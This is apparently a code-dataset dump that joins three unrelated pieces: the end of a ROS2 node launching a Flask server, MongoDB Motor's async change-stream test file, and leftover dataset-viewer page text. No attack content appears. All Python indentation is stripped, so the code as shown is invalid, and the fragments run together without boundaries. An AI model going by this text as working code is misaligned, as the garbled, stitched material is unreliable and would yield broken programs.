def run_page():
app.run(host="0.0.0.0")
def main(args=None):
global web_command_publisher
rclpy.init(args=args)
web_command_publisher = WebCommandPublisher()
t = threading.Thread(target=run_page)
t.start()
rclpy.spin(web_command_publisher)
web_command_publisher.destroy_node()
rclpy.shutdown()
if __name__ == "__main__":
main()
|
test_motor_change_stream.py
|
# Copyright 2017-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, unicode_literals
"""Test MotorChangeStream."""
import os
import threading
import time
from pymongo.errors import InvalidOperation, OperationFailure
from tornado.testing import gen_test
from test import SkipTest, env
from test.tornado_tests import MotorTest
class MotorChangeStreamTest(MotorTest):
@classmethod
@env.require_version_min(3, 6)
def setUpClass(cls):
super(MotorChangeStreamTest, cls).setUpClass()
if env.is_standalone:
raise SkipTest("Standalone")
# Ensure the collection exists.
env.sync_cx.motor_test.test_collection.delete_many({})
env.sync_cx.motor_test.test_collection.insert_one({'_id': 1})
def wait_and_insert(self, change_stream, n=1):
# The start time of the change stream is nondeterministic. Wait
# to ensure this insert comes after the change stream starts.
def target():
start = time.time()
timeout = float(os.environ.get('ASYNC_TEST_TIMEOUT', 5))
while not change_stream.delegate:
if time.time() - start > timeout:
print("MotorChangeStream never created ChangeStream")
return
time.sleep(0.1)
self.io_loop.add_callback(self.collection.insert_many,
[{} for _ in range(n)])
t = threading.Thread(target=target)
t.daemon = True
t.start()
@gen_test
async def test_async_for(self):
change_stream = self.collection.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
self.assertEqual(i, 2)
@gen_test
async def test_watch(self):
coll = self.collection
with self.assertRaises(TypeError):
# pipeline must be a list.
async for _ in coll.watch(pipeline={}):
pass
change_stream = coll.watch()
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
change = await future
# New change stream with resume token.
await coll.insert_one({'_id': 23})
change = await coll.watch(resume_after=change['_id']).next()
self.assertEqual(change['fullDocument'], {'_id': 23})
@gen_test
async def test_close(self):
coll = self.collection
change_stream = coll.watch()
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
await future
await change_stream.close()
with self.assertRaises(StopAsyncIteration):
await change_stream.next()
async for _ in change_stream:
pass
@gen_test
async def test_missing_id(self):
coll = self.collection
change_stream = coll.watch([{'$project': {'_id': 0}}])
future = change_stream.next()
self.wait_and_insert(change_stream)
with self.assertRaises(InvalidOperation):
await future
# The cursor should now be closed.
with self.assertRaises(StopAsyncIteration):
await change_stream.next()
@gen_test
async def test_unknown_full_document(self):
coll = self.collection
change_stream = coll.watch(full_document="unknownFullDocOption")
future = change_stream.next()
self.wait_and_insert(change_stream, 1)
with self.assertRaises(OperationFailure):
await future
@gen_test
async def test_async_with(self):
async with self.collection.watch() as change_stream:
self.wait_and_insert(change_stream, 1)
async for _ in change_stream:
self.assertTrue(change_stream.delegate._cursor.alive)
break
self.assertFalse(change_stream.delegate._cursor.alive)
@gen_test
async def test_with_statement(self):
with self.assertRaises(RuntimeError):
with self.collection.watch():
pass
@env.require_version_min(4, 0)
@gen_test
async def test_client(self):
change_stream = self.cx.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
await self.cx.other_db.other_collection.insert_one({})
async for _ in change_stream:
i += 1
if i == 3:
break
@env.require_version_min(4, 0)
@gen_test
async def test_database(self):
change_stream = self.db.watch()
self.wait_and_insert(change_stream, 2)
i = 0
async for _ in change_stream:
i += 1
if i == 2:
break
await self.db.other_collection.insert_one({})
async for _ in change_stream:
i += 1
if i == 3:
break
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.